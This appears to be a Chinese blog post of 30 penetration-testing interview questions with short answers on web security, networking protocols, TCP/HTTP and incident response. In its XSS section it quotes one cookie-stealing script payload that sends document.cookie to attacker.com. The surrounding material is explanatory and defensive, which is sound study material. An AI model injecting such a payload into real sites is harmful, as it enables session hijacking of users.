2025年渗透测试面试题总结-213(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
一、对称加密和非对称加密
二、同源策略(Same-Origin Policy)
三、Cookie存储位置与访问
四、XSS盗取Cookie的原理
五、XSS有Cookie是否能无密码登录?
六、XSS防御措施
七、SYN攻击原理(SYN Flood)
八、网络钓鱼(Phishing)
九、CC攻击(Challenge Collapsar)
十、Web服务器入侵排查步骤
十一、DLL文件(动态链接库)
十二、HTTPS的作用
十三、常见Web攻击防御
十四、重要协议分布层
十五、ARP协议工作原理
十六、RIP协议(路由信息协议)
十七、RARP(反向地址解析协议)
十八、OSPF协议(开放最短路径优先)
十九、TCP vs UDP 区别
二十、三次握手与四次挥手
二十一、TCP为什么三次握手?
二十二、DNS的工作原理
二十三、完整HTTP请求过程
二十四、Cookies vs Session
二十五、GET vs POST
二十六、HTTPS vs HTTP
二十七、Session工作原理
二十八、HTTP长连接 vs 短连接
二十九、OSI七层模型
三十、TCP粘包/拆包
一、对称加密和非对称加密二、什么是同源策略?三、cookie 存在哪里?可以打开吗?四、xss 如何盗取 cookie?五、xss 有 cookie 一定可以无用户名密码登录吗?六、xss 如何防御?七、SYN 攻击原理八、什么是网络钓鱼?九、什么是 CC 攻击?十、Web 服务器被入侵后,怎样进行排查?十一、dll 文件是什么意思,有什么用?十二、Https 的作用十三、防范常见的 Web 攻击十四、重要协议分布层十五、arp 协议的工作原理十六、rip 协议是什么?rip 的工作原理十七、什么是 RARP?工作原理十八、OSPF 协议?OSPF 的工作原理十九、TCP 与 UDP 区别总结二十、什么是三次握手四次挥手?二十一、tcp 为什么要三次握手?二十二、dns 是什么?dns 的工作原理二十三、一次完整的 HTTP 请求过程二十四、Cookies 和 session 区别二十五、GET 和 POST 的区别二十六、HTTPS 和 HTTP 的区别二十七、session 的工作原理?二十八、http 长连接和短连接的区别二十九、OSI 的七层模型都有哪些?三十、session 的工作原理?什么是 TCP 粘包/拆包?发生原因?解决方案
一、对称加密和非对称加密
类型 原理 特点 典型算法 对称加密 加密解密使用同一密钥 速度快、适合大数据量,但密钥分发不安全 AES, DES, 3DES 非对称加密 公钥加密、私钥解密(或反之) 安全性高、速度慢,用于密钥交换或签名 RSA, ECC, Diffie-Hellman
二、同源策略(Same-Origin Policy)
- 定义:浏览器核心安全机制,限制不同源的文档/脚本相互访问资源。
- 同源条件:协议、域名、端口三者完全相同。
- 作用:防止恶意网站窃取用户数据(如Cookie、DOM)。
三、Cookie存储位置与访问
- 存储位置:浏览器本地(硬盘或内存)。
- 能否打开:
- 明文Cookie可通过浏览器开发者工具(Application → Cookies)直接查看。
- HttpOnly Cookie禁止JavaScript访问,防XSS盗取。
四、XSS盗取Cookie的原理
- 攻击者注入恶意脚本(如
<script>fetch('attacker.com?cookie='+document.cookie)</script>
)。- 用户浏览器执行脚本,自动发送Cookie到攻击者服务器。
- 攻击者用Cookie模拟用户身份登录。
五、XSS有Cookie是否能无密码登录?
- 不一定,需满足:
- Cookie包含完整会话标识(如Session ID)。
- 目标网站仅依赖Cookie认证(无IP验证/二次授权)。
- Cookie未过期且未启用HttpOnly。
六、XSS防御措施
- 输入过滤:对用户输入转义(如
<
→<
)。- 输出编码:根据输出位置(HTML/JS/CSS)采用不同编码规则。
- CSP(内容安全策略):限制脚本来源,如
Content-Security-Policy: default-src 'self'
。- HttpOnly Cookie:禁止JS读取敏感Cookie。
七、SYN攻击原理(SYN Flood)
- 攻击者发送大量伪造IP的SYN包到服务器。
- 服务器回复SYN-ACK并等待第三次握手(消耗资源)。
- 半连接队列满导致正常请求被拒绝(DoS攻击)。
八、网络钓鱼(Phishing)
- 定义:伪装成可信实体(如银行、邮件服务),诱导用户提交敏感信息(密码、银行卡)。
- 形式:伪造链接、虚假网站、钓鱼邮件。
九、CC攻击(Challenge Collapsar)
- 本质:针对应用层的DDoS攻击。
- 原理:模拟大量合法请求(如刷新页面、API调用),耗尽服务器资源(CPU/连接数)。
- 特点:攻击IP分散,难以用IP黑名单防御。
十、Web服务器入侵排查步骤
- 隔离服务器:断网避免扩散。
- 日志分析:检查Web日志(如Nginx/Access Log)、系统日志(
/var/log/auth.log
)。- 进程检查:
top
、ps aux
查找异常进程。- 文件校验:对比关键文件哈希值(如
rpm -V
)。- 后门检测:排查定时任务、启动项、隐藏账户。
十一、DLL文件(动态链接库)
- 作用:包含代码/数据的共享库,供多个程序调用。
- 优势:减少重复代码、模块化开发、节省内存。
- 风险:DLL劫持(恶意替换合法DLL)。
十二、HTTPS的作用
- 加密传输:TLS/SSL加密数据防窃听(如AES加密)。
- 身份认证:证书验证服务器身份(防中间人攻击)。
- 数据完整性:MAC(消息认证码)防篡改。
十三、常见Web攻击防御
攻击类型 防御措施 SQL注入 参数化查询、ORM框架、输入过滤 CSRF Anti-CSRF Token、验证Referer、SameSite Cookie属性 文件上传 限制文件类型、重命名文件、存储到非Web目录 SSRF 过滤内网IP、禁用URL协议(如 file://
)、白名单域名
十四、重要协议分布层
层级 协议示例 应用层 HTTP, FTP, DNS, SMTP 传输层 TCP, UDP 网络层 IP, ICMP, ARP, OSPF 数据链路层 Ethernet, PPP
十五、ARP协议工作原理
- 作用:通过IP地址解析MAC地址。
- 流程:
- 主机A广播ARP请求(目标IP → 目标MAC)。
- 目标主机B单播回复ARP响应(包含自身MAC)。
- 主机A缓存IP-MAC映射(ARP表)。
十六、RIP协议(路由信息协议)
- 类型:距离向量协议(DV),适用于小型网络。
- 工作原理:
- 路由器每30秒广播路由表给邻居。
- 使用跳数(Hops)作为度量(最大15跳)。
- 收到更新后,选择跳数最小的路径。
十七、RARP(反向地址解析协议)
- 作用:通过MAC地址获取IP地址(常用于无盘工作站)。
- 流程:主机广播RARP请求 → RARP服务器响应并分配IP。
十八、OSPF协议(开放最短路径优先)
- 类型:链路状态协议(LS),适用于大型网络。
- 工作原理:
- 路由器泛洪LSA(链路状态通告)给所有OSPF邻居。
- 构建全网拓扑图(LSDB)。
- 使用Dijkstra算法计算最短路径树(SPF)。
十九、TCP vs UDP 区别
对比项 TCP UDP 连接方式 面向连接(三次握手) 无连接 可靠性 可靠传输(重传、确认) 不可靠 速度 慢(开销大) 快(开销小) 应用场景 网页(HTTP)、邮件(SMTP)、文件传输(FTP) 视频流、DNS、实时游戏
二十、三次握手与四次挥手
- 三次握手(建立连接):
- Client → SYN → Server
- Server → SYN+ACK → Client
- Client → ACK → Server
- 四次挥手(断开连接):
- A → FIN → B
- B → ACK → A
- B → FIN → A
- A → ACK → B
二十一、TCP为什么三次握手?
- 根本原因:防止失效的连接请求被服务器误认为新请求。
- 举例:若Client的SYN因延迟重发,两次握手会导致服务器建立冗余连接。
二十二、DNS的工作原理
- 浏览器查询本地缓存 → 无则向本地DNS服务器请求。
- 本地DNS递归查询:根DNS → 顶级域(.com)→ 权威DNS(example.com )。
- 返回IP地址给浏览器。
二十三、完整HTTP请求过程
- DNS解析:域名 → IP地址。
- TCP连接:与服务器三次握手。
- 发送请求:HTTP报文(GET/POST等)。
- 服务器响应:返回HTML/CSS/JS等资源。
- 浏览器渲染:构建DOM树、渲染页面。
- 断开连接:TCP四次挥手。
二十四、Cookies vs Session
对比项 Cookies Session 存储位置 客户端 服务端 安全性 较低(可被窃取) 较高(仅Session ID在Cookie中) 生命周期 可设置长期有效 会话结束即失效 存储数据类型 字符串 任意对象
二十五、GET vs POST
对比项 GET POST 数据位置 URL参数(明文) 请求体(可加密) 安全性 低(暴露在历史记录/URL中) 较高 数据长度限制 有(URL长度限制) 无 幂等性 幂等(多次请求结果相同) 非幂等
二十六、HTTPS vs HTTP
对比项 HTTP HTTPS 协议 明文传输 HTTP + TLS/SSL加密 端口 80 443 性能 快(无加密开销) 慢(握手延迟、加解密消耗) 证书 无需 需CA签发证书
二十七、Session工作原理
- 用户登录后,服务端创建Session并存储(内存/数据库)。
- 生成唯一Session ID返回给浏览器(通过Set-Cookie)。
- 后续请求携带Session ID,服务端据此验证用户状态。
二十八、HTTP长连接 vs 短连接
- 短连接:每次请求完成后断开TCP连接(HTTP/1.0默认)。
- 长连接(Keep-Alive):复用TCP连接处理多次请求(HTTP/1.1默认),减少握手开销。
二十九、OSI七层模型
层级 功能 协议示例 应用层 用户接口 HTTP, FTP, SMTP 表示层 数据格式转换、加密 SSL/TLS(部分功能) 会话层 建立/管理会话 NetBIOS, RPC 传输层 端到端数据传输 TCP, UDP 网络层 寻址和路由选择 IP, ICMP, OSPF 数据链路层 物理寻址、帧传输 Ethernet, PPP 物理层 比特流传输 RJ45, 光纤
三十、TCP粘包/拆包
- 问题:多个数据包被合并(粘包)或拆分(拆包)接收。
- 原因:
- 应用层数据大于TCP缓冲区大小(拆包)。
- 多个小数据包被合并发送(粘包)。
- 解决方案:
- 固定长度:每包数据填充至固定长度。
- 分隔符:约定特殊字符作为边界(如
\n
)。- 头部声明长度:在数据包头部添加长度字段(如HTTP的
Content-Length
)